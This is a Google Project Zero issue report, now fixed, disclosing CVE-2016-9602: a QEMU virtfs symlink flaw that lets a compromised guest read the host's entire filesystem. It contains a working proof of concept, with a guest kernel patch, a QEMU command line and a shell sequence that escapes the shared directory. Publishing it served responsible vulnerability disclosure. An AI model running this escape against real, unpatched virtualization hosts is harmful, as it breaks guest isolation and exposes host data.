Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 4 users
Status: Fixed
Closed: Mar 2

Sign in to add a comment
QEMU: virtfs permits guest to access entire host filesystem
Project Member Reported by, Dec 9 2016 Back to list
If an attacker can execute arbitrary code in the guest kernel and a virtfs is set up, the attacker can access the entire filesystem of the host using a symlink attack. This might require the security model "passthrough" or "none" - I haven't tested with the mapped modes.

Repro steps:

1. Place some file on the host that is not present in the guest - I use a file "real_root_marker" in the root directory of the host:

# echo "this is the host's filesystem root" > /real_root_marker

2. Clone the Linux kernel, apply the following patch and compile it:

diff --git a/fs/9p/vfs_inode.c b/fs/9p/vfs_inode.c
index 30ca770..d6e47df 100644
--- a/fs/9p/vfs_inode.c
+++ b/fs/9p/vfs_inode.c
@@ -803,6 +803,8 @@ struct dentry *v9fs_vfs_lookup(struct inode *dir, struct dentry *dentry,
                return ERR_CAST(dfid);
        name = (char *) dentry->;
+       if (!strncmp(name, "SAME_", 5))
+               name = name + 5;
        fid = p9_client_walk(dfid, 1, &name, 1);
        if (IS_ERR(fid)) {
                if (fid == ERR_PTR(-ENOENT)) {

3. Run qemu, with the patched kernel as guest kernel and with at least one virtfs filesystem. I'm using the following commandline, but that's somewhat specific to my setup - anything with a virtfs in passthrough/none mode should work as far as I can tell:

/path/to/qemu/x86_64-softmmu/qemu-system-x86_64 -m 500M -enable-kvm -nographic \
-snapshot \
-drive file=build/initfs.fsimg,index=0,media=disk \
-virtfs local,path=./vm_root,mount_tag=virt_root,security_model=passthrough \
-kernel ./vm_root/root/linux/arch/x86/boot/bzImage \
-net user,net=,host=,restrict=off,dns=,hostfwd=tcp: \
-net nic \
-append "root=/dev/sda ro debug ignore_loglevel console=ttyS0"

4. Inside the VM, mount the virtfs.
5. Somewhere inside the virtfs mountpoint, do this:

root@jannh-vm:/tmp# cat /real_root_marker
cat: /real_root_marker: No such file or directory
root@jannh-vm:/tmp# mkdir deleteme
root@jannh-vm:/tmp# cd SAME_deleteme
root@jannh-vm:/tmp/SAME_deleteme# rmdir /tmp/deleteme
root@jannh-vm:/tmp/SAME_deleteme# ln -s / /tmp/deleteme
root@jannh-vm:/tmp/SAME_deleteme# cat real_root_marker
this is the host's filesystem root

I tested with a recent qemu version from git:// (commit a92f7fe5a82ac9e8d127e92c5dce1a84064126da).

I believe that this is a security issue because according to the qemu manpage, virtfs only exposes the specified directory, while actually, it is possible to access the entire host filesystem.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member Comment 1 by, Jan 17 2017
Labels: CVE-2016-9602
Disclosed on oss-security with proposed patch attached:
Project Member Comment 2 by, Jan 30 2017
New patch series with hopefully working patch is now public at:

Not merged into their repo yet afaics.
Project Member Comment 3 by, Feb 16 2017
Labels: -Restrict-View-Commit
I'm derestricting the bug because it was publicly announced on oss-security and patches are public.
Comment 4 Deleted
Comment 5 Deleted
Project Member Comment 6 by, Mar 2
Status: Fixed
The bug has landed in upstream's git repo (;a=commit;h=7287e3556fdc56bfd0666a67d6b1d3ca9ce04083).
Sign in to add a comment